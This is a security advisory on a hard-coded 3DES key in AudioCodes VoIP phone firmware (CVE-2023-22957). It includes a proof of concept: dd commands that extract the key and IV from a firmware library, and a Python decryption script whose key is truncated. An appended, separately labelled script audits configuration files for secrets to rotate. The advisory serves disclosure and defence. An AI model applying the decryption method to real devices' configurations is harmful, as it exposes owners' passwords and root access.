Advisory ID:               SYSS-2022-052
Product:                   AudioCodes VoIP Phones
Manufacturer:              AudioCodes Ltd.
Affected Version(s):       Firmware Versions < 3.4.8.808
Tested Version(s):         Firmware Version 3.4.4.1000
Vulnerability Type:        Use of Hard-coded Cryptographic Key (CWE-321)
Risk Level:                Medium
Solution Status:           Fixed
Manufacturer Notification: 2022-11-11
Solution Date:             2023-08-15
Public Disclosure:         2023-08-10
CVE Reference:             CVE-2023-22957
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

AudioCodes VoIP phones are modern desk phones designed for use in
enterprise environments.

The manufacturer describes the product as follows (see [1]):

"The AudioCodes 400HD series of IP phones is a range of easy-to-use,
feature-rich desktop devices for the service provider hosted services,
enterprise IP telephony and contact center markets.
Based on the same advanced, field-proven underlying technology as our
other VoIP products, AudioCodes high quality IP phones enable systems
integrators and end customers to build end-to-end VoIP solutions."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The AudioCodes VoIP phones store sensitive information, e.g. credentials
and passwords, in encrypted form in their configuration files.

These encrypted values can also be configured automatically, e.g. via
the "One Voice Operation Center" or other central device management
solutions.

Because the encryption uses a hardcoded cryptographic key, an attacker
with access to these configuration files is able to decrypt the
encrypted values and retrieve sensitive information, e.g. the device
root password.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

By analyzing the shared library "libac_des3.so" of an AudioCodes IP
phone firmware in a disassembler and decompiler, e.g. Ghidra, the
encryption mechanism could be reversed and the hardcoded cryptographic
key could be extracted.

Used encryption algorithm: Triple DES in CBC mode
Memory address of the 24-byte 3DES key in the library: 00000fb8
Memory address of the 8-byte 3DES IV: 00000fb0

Extracting the key:

#> offset=$(python3 -c 'print(int("00000fb8", base=16))')
#> dd skip=$offset count=24 if=libac_des3.so of=key.bin bs=1

Extracting the IV:

#> offset=$(python3 -c 'print(int("00000fb0", base=16))')
#> dd skip=$offset count=8 if=libac_des3.so of=iv.bin bs=1

The following proof-of-concept Python script can be used for
decryption:

import sys
import base64
from Crypto.Cipher import DES3
from binascii import hexlify, unhexlify

# Base64-encoded encrypted value taken from a configuration file
coded_string = sys.argv[1]
ciphertext = base64.b64decode(coded_string)
print("cipher text: " + str(hexlify(ciphertext)))

# Hardcoded key and IV as extracted from libac_des3.so (truncated here)
cipher = DES3.new(
    unhexlify('604075fb509b8269[...]'),
    DES3.MODE_CBC,
    iv=unhexlify('a3a47c5b[...]')
)
plaintext = cipher.decrypt(ciphertext)
print("plain text: " + str(plaintext.decode('utf-8')))

Execution of the proof-of-concept script:

#> python decrypt.py kUqyNmIT1cDyBwGTu6J1Dw==
cipher text: b'914ab2366213d5c0f2070193bba2750f'
plain text: S3cr3tP455w0rd

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update devices to firmware version 3.4.8.M4 and define an individual
and strong secret from which the encryption key is derived.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-11-03: Vulnerability discovered
2022-11-11: Vulnerability reported to manufacturer
2022-12-12: Vulnerability confirmed by AudioCodes Ltd.
2023-01-19: AudioCodes Ltd. adapts the documentation so that it no
            longer states that the passwords are encrypted but
            obfuscated
2023-07-13: AudioCodes Ltd. informs that the upcoming release 3.4.8.M4
            will include a feature that allows setting a custom
            password from which the key will be derived
2023-08-10: Public disclosure at BlackHat USA[5]
2023-08-11: Public disclosure at https://blog.syss.com[6]
2023-09-11: Discussion with AudioCodes on the vulnerability state.
2023-09-12: AudioCodes Ltd. informs that the vulnerability is fixed in
            firmware version 3.4.8.808 released on August 15th.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] AudioCodes IP Phones Product Website
    https://www.audiocodes.com/solutions-products/products/ip-phones
[2] AudioCodes One Voice Operation Center User's Manual
    https://www.audiocodes.com/media/15928/one-voice-operations-center-users-manual-ver-80.pdf
[3] SySS Security Advisory SYSS-2022-052
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-052.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[5] BlackHat USA Briefings Session
    https://www.blackhat.com/us-23/briefings/schedule/#zero-touch-pwn-abusing-zooms-zero-touch-provisioning-for-remote-attacks-on-desk-phones-31341
[6] Detailed Blog Post
    https://blog.syss.com/posts/zero-touch-pwn/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
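
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Added example (not part of the SySS advisory and not AudioCodes code):
because the key and IV described under "Vulnerability Details" are
fixed, every value stored under the old scheme should be treated as
exposed and rotated once the fix from "Solution" is in place, and equal
secrets yield equal ciphertexts. The sketch below inventories such
values in exported configuration files; the name=value layout and the
parameter names are constructed assumptions, and only the first sample
blob is taken from the PoC above.

```python
import base64
import binascii
import re
from collections import defaultdict

BLOCK = 8  # 3DES block size in bytes; CBC ciphertext is a multiple of it

# Constructed sample: hypothetical "name=value" config lines for two devices.
# Parameter names are invented; only the first blob comes from the advisory.
SAMPLE = {
    "phone-a.cfg": "example/admin_password=kUqyNmIT1cDyBwGTu6J1Dw==\n"
                   "example/display_name=Reception\n",
    "phone-b.cfg": "example/admin_password=kUqyNmIT1cDyBwGTu6J1Dw==\n"
                   "example/sip_password=AAECAwQFBgc=\n"
                   "example/ntp_server=10.0.0.1\n",
}

LINE = re.compile(r"^\s*([^=#\s]+)\s*=\s*(\S+)\s*$")


def looks_like_3des_blob(value):
    """Heuristic: strict base64 that decodes to a non-empty multiple of 8 bytes."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) > 0 and len(raw) % BLOCK == 0


def audit(configs):
    """Return (findings, reused): all candidate blobs, and blobs seen more than once."""
    seen = defaultdict(list)
    for filename, text in configs.items():
        for line in text.splitlines():
            m = LINE.match(line)
            if m and looks_like_3des_blob(m.group(2)):
                seen[m.group(2)].append((filename, m.group(1)))
    findings = sorted(loc for locs in seen.values() for loc in locs)
    reused = {blob: locs for blob, locs in seen.items() if len(locs) > 1}
    return findings, reused


if __name__ == "__main__":
    findings, reused = audit(SAMPLE)
    for filename, name in findings:
        print(f"rotate after upgrade: {filename}: {name}")
    for blob, locs in reused.items():
        print(f"same secret on {len(locs)} entries: {locs}")
```

The length check is a heuristic and can flag unrelated base64 values, so
review the findings before rotating.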